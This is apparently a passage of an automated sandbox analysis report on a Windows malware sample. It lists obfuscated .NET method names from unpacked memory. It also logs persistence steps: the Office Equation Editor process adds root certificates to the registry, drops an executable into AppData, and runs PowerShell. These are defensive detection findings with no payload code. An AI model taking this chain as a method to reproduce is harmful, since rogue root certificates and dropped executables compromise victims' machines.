            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, kQMY18YRSxSjPa7Enu.csHigh entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, zSxtCKQlluoBoaYfXp.csHigh entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, Oas0CkJLP86ncCAk06.csHigh entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, XknLE6sxi0AB9TbxvRc.csHigh entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, dvDQ8ooxdtG6SWtXGT.csHigh entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, GgKL0Eg5Wkhg2YdC0x.csHigh entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, yT6mC6B4fPpfSn1yjG.csHigh entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, DPIJJa2JNOwrGoKDAd.csHigh entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, BR4r9SHUAmvVNPGE5t.csHigh entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, C7Kf5VfB7dASIKDlYf.csHigh entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, w54Wwi7tk9esttsuBg.csHigh entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, va4sUbS6hEyNbApReb.csHigh entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, D2UDibly6dG7h6hnQq.csHigh entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, Qh9yHxsORTqQFMRRqnU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, KGQivG4jZoZqi3K2bp.csHigh entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.csHigh entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, c8JUhb5EhV7YevbYMr.csHigh entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, xUxCqCtuE8HCR9gjRX.csHigh entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, sM5uBfyrWcuZmGJ521.csHigh entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, kQMY18YRSxSjPa7Enu.csHigh entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obie8920193.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
